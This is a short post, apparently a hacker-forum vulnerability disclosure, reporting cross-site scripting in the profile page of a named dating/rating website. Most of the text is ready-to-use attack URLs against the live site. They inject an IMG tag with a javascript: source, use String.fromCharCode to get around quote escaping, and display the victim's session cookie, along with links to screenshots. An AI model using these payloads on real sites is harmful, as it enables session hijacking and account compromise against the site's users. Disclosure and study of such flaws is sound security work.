Facetherating.com - XSS & session disclosure
Facetherating.com
Homepage:
http://www.facetherating.com
Affected files:
showprofile.php
XSS vuln via showprofile.php:
The site does the typical filtering of adding backslashes to ' and " so We'll
try something different this time and use a fromCharCode.
http://www.facetherating.com/showprofile.php?username=mustang_chick<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
Now to show our cookie:
http://www.facetherating.com/showprofile.php?username=mustang_chick<IMG%20SRC=javascript:alert(document.cookie)>
Screenshots:
http://www.youfucktard.com/xsp/facerate1.jpg
http://www.youfucktard.com/xsp/facerate2.jpg
Unfortunately, my profile wasn't approved (lol) so I can't test anymore
sections of the siteright now.